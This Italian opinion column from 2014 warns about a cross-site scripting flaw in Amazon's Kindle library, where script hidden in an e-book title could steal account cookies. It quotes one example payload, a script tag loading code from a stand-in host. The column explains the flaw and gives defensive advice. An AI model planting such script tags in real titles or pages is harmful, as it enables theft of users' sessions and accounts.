Gli ebook nel mirino degli hacker

• di Umberto Rapetto
• 17 Settembre 2014

Stamani ho raggiunto la stazione ferroviaria in metropolitana. E, per chi conosce le mie abitudini di motociclista climaticamente imperturbabile, questa potrebbe già essere la notizia. Ma non è così. Nonostante la calca, molti gladiatori e amazzoni del pendolariato urbano tenevano stretto tra le mani un lettore di libri elettronici, quello che tutti ormai chiamano con nonchalance “e-book reader“. E tutti loro, incuranti dell’affollamento e del servizio di trasporto inqualificabile al punto da non poter esser definito servizio, erano intenti a legger qualcosa.

Una meraviglia. Vedere persone che non hanno perso il gusto di leggere mi ha riempito il cuore di gioia, ma non ho fatto in tempo a rallegrarmi che subito i miei pensieri sono corsi all’ultimo incubo di sicurezza informatica. E per sventura, riguardava proprio molti di loro.

Proprio in questi giorni è riapparsa una minaccia che – scoperta nell’ottobre di un anno fa – molti credevano esser stata curata a dicembre e definitivamente archiviata. Il 16 settembre sarebbe stato individuato un nuovo specifico rimedio.

A lanciare l’allarme è un ricercatore particolarmente attivo, Benjamin Daniel Mussler, che non esita a spiegare che gli hacker possono ‘avvelenare’ i lettori Kindle utilizzando codici maligni o ‘script‘, nascosti ad esempio nel titolo di un e-book, andando a compromettere gravemente l’account Amazon del malcapitato di turno.

L’azione criminale va a colpire le funzioni di gestione dei contenuti e dei dispositivi e quelle di impostazione dell’apparato presenti nella libreria di Kindle. Una tanto impercettibile quanto venefica istruzione maligna come « <script src=”https://www.example.org/script.js”></script> » può essere mandata in esecuzione non appena l’utente apre la pagina web del Kindle Store: i cookies dell’account di Amazon possono essere raggiunti e trasferiti a chi ha progettato la trappola con conseguenze sgradevoli per chi si è inconsapevolmente fatto scippare la propria identità di bibliofilo digitale.

Mentre gli e-book “originali” sono considerati sicuri, quelli acquisiti da fonti non certificate (siti “birichini” o amici/colleghi pronti a condividere file di dubbia o ignota provenienza) possono essere sfruttati dai moderni manigoldi per andare a segno.

Mentre gli esperti sono al lavoro per verificare se il “fixing” (ovvero la riparazione della falla) è andato a buon fine, la raccomandazione è quella di non cadere nella tentazione di accaparrarsi libri elettronici di cui non si conosce l’origine o che si sa essere frutto di più o meno acrobatiche scorribande.

Sempre stamani, sempre in metropolitana, ho visto tanta gente che sfogliava libri ‘veri’, libri di carta, accarezzandone le pagine e piegando l’angolo superiore del foglio che erano giunti a leggere arrivando alla propria fermata così da non perdere il segno. Avrei voluto dir loro quanto erano fortunati a non doversi preoccupare di pirati e banditi, ma erano già felici così mentre stringevano il loro volume gelosamente rivestito con carta di fortuna per preservarne la copertina originale. E la loro letizia ha contagiato anche me.

Twitter: @Umberto_Rapetto